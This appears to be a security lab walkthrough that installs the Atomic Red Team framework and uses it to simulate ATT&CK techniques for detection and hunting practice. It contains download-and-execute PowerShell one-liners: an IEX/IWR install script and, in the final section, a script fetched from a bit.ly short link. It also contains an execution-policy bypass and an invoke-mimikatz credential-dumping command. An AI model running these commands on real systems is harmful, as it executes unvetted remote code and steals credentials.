L1200 Atomic Red Team
- Login to Member Server
- ART: Invoke Technique T1218
- Understanding Technique T1218
- Technique T1003 Power Shell MimiKatz
The Atomic Red Team framework is a “Small and highly portable [framework for] detection tests based on MITRE's ATT&CK.” The tool is designed as an adversarial simulation test engine. For example, if an organization wishes to test its controls against T1003 – Credential Dumping – it can do this with a single command (after a one-liner installation of the framework).
Investigate the Atomic Red Team framework. The ART framework is the gold standard for adversarial simulations.
Utilize the MITRE ATT&CK Framework to efficiently simulate adversarial attacks. Hunt for Indicators of Compromise related to those simulated attacks.
Install Atomic Red Team Framework
Login to Member Server
Connect via Remote Desktop to the Member Server, WS01.
- If you are already connected, use the current session.
- See Lab L0200 for connection instructions.
PowerShell
Launch Windows PowerShell from the Windows Start Menu.
- See Lab L0250 for instruction on launching PowerShell
Run the following command to allow the execution of the Atomic Red Team framework:
Set-ExecutionPolicy bypass -force
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\users\itadmin> Set-ExecutionPolicy bypass -force
PS C:\users\itadmin>
The next commands will install the framework.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$ProgressPreference = 'SilentlyContinue'
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
Install-AtomicRedTeam -getAtomics -Force
You may get prompted to install a "NuGet" provider. Accept all requests for installation.
 |
|---|
Now that Atomic Red Team (ART) is installed, move on tho the next portion of this lab.
ART: Invoke Technique T1218.10
Continue to operate from the PowerShell session from the previous lab section. Details on connecting to the PowerShell session are found in the prior lab section. Perform an Atomic test. In this example, Technique T1218 – Signed Binary Proxy Execution, Sub-Technique ID 010 (Regsvr32) was used and “popped” multiple instances of calculator
Invoke-AtomicTest T1218.010
 |
|---|
Continue on to the next portion of this lab.
Understanding Technique T1218 and its SubTechniques
The next step is an architecture investigation against the Atomic Red Team framework, which includes a review of the T1218 attack structure and operations.
Navigate to the atomics folder at this path: C:\AtomicRedTeam\atomics\T1218.010 using Windows Explorer. The container includes several objects of interest. The T1218.010.md describes the specific attacks mapped under this technique. The T1218.010.yaml file includes specific command invocations.
C:\AtomicRedTeam\atomics\T1218.010
 |
|---|
Right (alternate) click on the T1218.010.yaml file and choose Open with. The Open with prompt window may look different. Clear the check box for Always use.
  |
|---|
As seen in the next screenshot, search terms for a SIEM to start searching during the hunt have been identified (red arrows).
 |
|---|
Continue on to the next portion of this lab.
Technique T1003 Power Shell MimiKatz
Continue to operate from the PowerShell session from the previous lab section. Details on connecting to the PowerShell session are found in the prior lab section. As of this update, the technique is failing due to the previously discussed SSL / TLS support in PowerShell.
The following error is occurring as of 04FEB21.
To correct this error will require upstream modifications to the AtomicRedTeam repository. However, the scripts shown in the technique can also be used manually.
Let's run the technique, T1003, credential dumping with the following manual commands:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1tCrad1e')"
invoke-mimikatz -dumpcreds
 |
|---|
